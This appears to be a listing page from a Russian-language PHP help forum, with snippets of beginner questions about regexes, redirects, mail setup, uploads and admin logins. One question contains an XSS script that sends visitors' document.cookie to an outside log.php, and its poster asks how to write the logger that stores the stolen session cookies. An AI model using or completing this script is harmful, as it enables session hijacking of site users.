PHP
A general-purpose scripting language especially suited to web development
Explore Questions
-
0 votes2 answers
-
0 votes1 answer
-
0 votes1 answer
-
0 votes2 answers
-
0 votes0 answers
2,481 questions in this forum
-
Помогите написать регулярное выражение
Есть код, Отрывок $capname = my_esc($_POST['NameCap']); if (preg_match("", $capname)) { die ("Неверный формат никнейма."); } После preg_match в кавычках нужно написать выражение в котором Можно использовать русские и английские буквы всех регистров, числа от 0 до 9, точка, пробел, и от 1 до 20 символов. Напишите пожалуйста кто умеет ... Благодарен заранее
0 votes7 answers -
PHP хелп ми по верстке
В общем ситуация следующая. Есть код Но у меня выводит оба дива один потом ниже другой. <?php $a = 1; if ($a == 1) ?> <div id="loginbox"></div> <?php else ?> <div id="loginbox1"></div> <?php endif; ?> Пытаюсь сделать чтобы если переменная а = 1, то выводит loginbox иначе loginbox1. Не пойму в чем дело мне кажется в синтаксисе пхп. С пхп знаком недавно в основном хтмл и css помогите разобраться.
0 votes7 answers -
Непонятки с mysql_num_rows
Взялся за написание скрипта, добавляющего таблицу в базу данных. В процессе написания появилась непонятная ошибка(success-подключение): Вот код: Не могу понять, в чем проблема.
0 votes7 answers -
Перенаправление в htaccess
Как в htaccess сделать,что если я захожу на a.html,открывает b.html,но в адресной строке продолжает светиться a.html?
0 votes7 answers -
htaccess как сделать редирект с всех внутрених страниц одного сайта на такуюже страницу другого сайта ?
те при открытии например: http://my-app.com/urm/test.htm -> 301 Redirect -> http://world.com/urm/test.htm http://my-app.com/page.htm -> 301 Redirect -> http://world.com/page.htm http://my-app.com/someinfo.php -> 301 Redirect -> http://world.com/someinfo.php
0 votes7 answers -
if request url для 20 страниц
Есть скрипт, который при заданном url вводит значение переменной, но он работает только для 1 страницы. Как мне его доработать, чтобы он работал для 20 страниц (на каждый url своё значение переменной)? <? if ($_SERVER['REQUEST_URI'] == "/diseases/varicosity.php") $traylin = "Варикоз"; ?> <div class="breadcrumbs"> <div itemscope itemtype="http://data-vocabulary.org/Breadcrumb"> Вы тут: <a itemprop="url" href="/"><span itemprop="title">Главная</span></a> › </div> <div itemscope itemtype="http://data-vocabulary.org/Breadcrumb"> <a itemprop="url" href="/trunk/diseases.php"><span itemprop="title">Болезни…
0 votes7 answers -
Скрипт вывода видео с youtube
Собственно поставил плагин для вордпресс. Выводит этот плагин например плейлист с youtube - может вывести одно видео или по нику автора. Но мне нужен именно плейлист. В плагине стоит ограничение на вывод 10 записей с youtube При этом плагин сам генерирует миниатюры и ставит кастомную кнопку плей на ролик, потом просто в попап по клику показывает видео. Собственно проблема вот в этом самом ограничении... Я вроде бы снял ограничение и дал возможность виджету выводить по 100 видеозаписей сразу, но почему то на странице в итоге показывается не 100 например видео, а ровно 25, если вставить друго ни больше ни меньше. Переменная отвечающая за вывод количества роликов на 262 ст…
0 votes7 answers -
конфиг phpmaailera
помогите пожалуйста разобраться с настройками скрипта для отправки писем PHPmailer подключение скрипта проблем не вызывает. не понятны настройки конфига $__smtp = array( "host" => "smtp.yandex.ru", //smtp сервер "debug" => 2, //отображение информации дебаггера (0 - нет вообще) "auth" => true, //сервер требует авторизации "port" => 25, //порт (по-умолчанию - 25) "username" => "%username%",//имя пользователя на сервере "password" => "%password%",//пароль "addreply" => "your@email.com",//ваш е-mail "replyto" => "your@email.com" //e-mail ответа);у меня бесплатный хостин…
0 votes7 answers -
Настройка Admin панель.
Всем привет,ребята,собственно изучаю сейчас PHP... Подскажите как реализовать,чтобы при нажатии на кнопку "Вход в админку", выводилось 2-а поля - "логин" "пароль". Ну а после правильного ввода меня перекидывало в админку. И что бы всё это бралось с sql
0 votes7 answers -
Как завершить сессию?(адм панель)
Есть такой вот код! <?php//include("index.php");if (!isset($_SERVER['PHP_AUTH_USER'])){ Header ("WWW-Authenticate: Basic realm=\"Admin Page\""); Header ("HTTP/1.0 401 Unauthorized"); exit();}else { if (!get_magic_quotes_gpc()) { $_SERVER['PHP_AUTH_USER'] = mysql_escape_string($_SERVER['PHP_AUTH_USER']); $_SERVER['PHP_AUTH_PW'] = mysql_escape_string($_SERVER['PHP_AUTH_PW']); } $STH = $DBH->query("SELECT pass FROM userlist WHERE user='".$_SERVER['PHP_AUTH_USER']."'"); $STH->setFetchMode(PDO::FETCH_OBJ); $row = $STH->fetch(); if (!$row) { Header ("WWW-Authenticate: Basic realm=\"Admin Page\""); Header ("HT…
0 votes7 answers -
Проверка размера файла через PHP
Привет, форумчане! У меня возник такой вопрос.. я пытаюсь загрузить три файла из формы.. и если один из них больше, чем это указано upload_max_filesize - возникает ошибка Warning: POST Content-Length of 12425553 bytes exceeds the limit of 8388608 bytes in Unknown on line 0. Можно ли как то исключить эту ошибку, какой-нибудь проверкой на PHP? или JS. Кто как решал подобные задачи?
0 votes7 answers -
Объясните про cname - зеркала и поддомены
Я немного запуталась, поддомен, который ссылается на корень сайта является по сути алисом этого сайта? В одной из панелей я создавла записть cname для алисов, но в cpanel я смогла лишь настроить поддомены, каждый из которых работает с корня сайта - что по сути выполняет мою задачу зеркала. Но я не смогла реализовать алиас через редактор днс - когда создаю записть к примеру test.mydomen.ru cname и захожу на нее - то вместо корня сайта - там стоит какой-то индексный файл от провайдера - заглушка для новых сайтов. Как узнать куда ссылается эта заись - на какую директорию? Такой вроде и нету... ничего не понимаю. Я даже не пойму - сабдомен и алиас для сабдомена - суть одно …
0 votes7 answers -
Помогите дописать регулярку для валидности поля почты
Всем привет !! Очередная проблема. В общем регулярки.... Есть у меня такое регулярное выражение для проверки e-mail ([\w-\.]+)@\D((?:[\w]+\.)+)([a-zA-Z]{2,4}) Но она пропускает адреса такого типа: qwerty..qwerty@gmail.comqwerty.@gmail.com.qwerty@gmail.comКак дописать регулярное выражение, что б отфильтровать эти точки ?
0 votes7 answers -
Конструктор проектов
Есть ресурс http://www.squarespace.com Внутри есть конструткор сайта, инструменты создающие на основе шаблона сайты. На чем написана серверная часть и фронетнед с бэкендом, как думаете? Это по типу AngularJS + PHP или что-то другое?
0 votes7 answers -
Защита от ботов
Всем привет. Поделитесь плз опытом. 1 Кто как защищается от ботов на сайте? 2 Была такая мысль. На каждую форму навесить обработчик, который будет перехватывать событие сабмита и к данным, что отправляются будет дописывать какой-то шифрованный ключ. И на сервере смотреть. Нет ключа - остальное даже не смотрим. Разве боты такое смогут сломать? 3 Ещё пару раз встречал проверку на "человека" в виде ползунка со страницы блокировки аифона. Насколько такая штука действенна? к примеру 3.1 = пока ползунок не подвинут - формы нет. И только потом подгружать её аяксом. 3.2 = пока ползунок не подвинут - форма блокируется с помощью js (но тут же снова нужно использовать схему …
0 votes7 answers -
Кто то знает есть ли такой видеокурс?!
Кто то знает есть ли такой видеокурс создание сайта знакомств по типу создание интернет магазинов?! единственое что я нашел так это здесь http://webformyself.com/forum/index.php/topic/1698/ но пока они его не делают а только обсуждают эту тему!!! кто то знает может еще где есть?!
0 votes7 answers -
Регулярка. Исключить .. из строки
Есть простенькая регулярка на проверкку мейла [a-z0-9_\.\-]{1,128}[@]\w+[.]\w+Собсна, нам интересна часть до собаки [a-z0-9_\.\-]Сейчас это проверка на символы и длину строки 1-128. Требуется сделать так, чтоб не пропускало 2 точки подряд. Как это сделать регуляркой ? (Вариант доп. функции, которая будет искать в строке .. не подходит) Язык: python Есть решение данной задачи ? Спасибо
0 votes7 answers -
.sh или php?
Возникла проблемма, моих знаний не хватает чтобы решить её рационально Есть 400 сайтов на сервере. в одном из них - лежит скрипт .sh, его используем для разворотки новых доменов Нужно пройтись по всем сайтам(список с ними получить не сложно, так как все в одной папке лежат) И подменить файлик с php.mailer-om (Так как нужно чтобы в нем был прописан SSL и новый порт. Впринципе порт можно во всех БД переписать, но SSL только заменой этого файла) Как дать доступ для PHP ко всем сайтам PHP скрипту, который лежит в этом главном сайте Или же, как организовать проход по всем сайтам(или по массиву с названием сайтов) и определить лежит ли на сайте phpMailer в нужном месте(больш…
0 votes7 answers -
Резервное копирование данных на удаленном сервере. Cron.
Привет всем! Нужно настроить резервное копирование на удаленном сервере используя cron. Есть ли готовые решения? Что можете посоветовать?
0 votes7 answers -
Неправильная работа users.search Вконтакте API
Столкнулся с любопытным случаем. Задача проста: получить объекты пользователей по строке поиска. Решение: метод users.search. Для него есть параметр "q" - question, query от чего они там сокращали. Результат: возвращается у меня топ пользователей или случайный их набор, независимо от строки поиска. Распечатал запрос, выполнил в браузере - тоже самое, все равно идет топ. Проверил запрос, вроде все на месте - параметр, кодированная с латиницы строка, токен. К счастью, проблема нашлась почти сразу и была очень глупой. Символы "q" и "g" при беглом взгляде на строку запроса (маленький шрифт) выглядят похоже. Как я умудрился туда засунуть "g" - не знаю, но факт - ошибки …
0 votes7 answers -
Многоуровневое меню на php
Здравствуйте. Есть таблица в БД, в которой указаны пункты меню (id | name | alias | parent_id) parent_id - id родительского пункта меню Вопрос как вывести список пунктов меню в несколько уровней? <ul> <li>Пункт 1 <ul class="submenu"> <li>Подпункт 1</li> <li>Подпункт 2</li> </ul> </li> <li>Пункт 2 <ul class="submenu"> <li>Подпункт 1</li> <li>Подпункт 2</li> </ul> </li> <li>Пункт 3</li> <li>Пункт 4 <ul class="submenu"> <li>Подпункт 1</li> <li>Подпункт 2</li> </ul> </li></ul>
0 votes7 answers -
как получить куку? хелп
Есть поле сообщений, где добавляется такой скрипт (ниже). Создается картинка с урлом в котором сессионая кука есть. Подскажите плиз как этот log.php должен быть написан принимающий один параметр и забрасывающий результат того, что в урле в текстовый файл log.txt? <script> url=document.cookie; var oImg=document.createElement("img"); oImg.setAttribute('src','http://sait/log.php?cookie='+url); oImg.setAttribute('alt','na'); oImg.setAttribute('height','1px'); oImg.setAttribute('width','1px'); document.body.appendChild(oImg); </script>
0 votes7 answers -
Отправка файлов ajax+php
Всем привет! Реализовал отправку файлов через phpmailer. Все работает. Хотел сделать это без перезагрузки страницы. Узнал, что для отправки файлов нужно использовать FormData. Замечательно. Нашел статью как все настроить, но не работает! Можно сказать все точь-в-точь как в примере, только у меня все равно переходит на страницу php, указанную в action. Может быть кто-то сталкивался и знает в чем может быть дело? Руководствовался: http://positron-it.ru/stati/otpravlenie_soobwenij_s_vlozheniem_po_ajax/ Правда по всему видимому автор в примере забыл указать action в форме.
0 votes7 answers -
move_uploaded_file()
if ($image['tmp_name'] <> ''){$url = "expo/img/".$image['name'];echo 'url = '.$url;move_uploaded_file($image['tmp_name'],'expo/img/'.$image['name']);} $url выводится, все в порядке. Путь прописан правильно, файл загружается.Выводится вместе с $url ошибка: url = expo/img/image.gifWarning: move_uploaded_file(expo/img/image.gif) [function.move-uploaded-file]: failed to open stream: No such file or directory in /home/site/www/www/panel/adde.php on line 33Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move '/tmp/phptj4Q6Y' to 'expo/img/image.gif' in /home/site/www/www/panel/adde.php on line 33Права доступа у папок стоят 777.
0 votes7 answers -
Совместное редактирование документа
Всем добрый день! Может кто сталкивался или в курсе. Стоит задача сделать редактирование документа в личном кабинете на сайте. Админ заливает документ, авторизованные пользователи заходят, видят его и могут вносить в него правки Вариант 1: кто то вносит правки в данный момент, остальным документ становится недоступен, иконка - редактируется. История сохраняется. Если не активен N минут, автосохранение и закрытие сессии. И например еще ограничение по времени. Начал редактировать, у вас осталось 59 минут. Вариант 2 (более крутой): Одновременное редактирование, с сохранением истории. Что бы было видно кто какие правки внес. Отредактированное подсвечивается. Вариант …
0 votes7 answers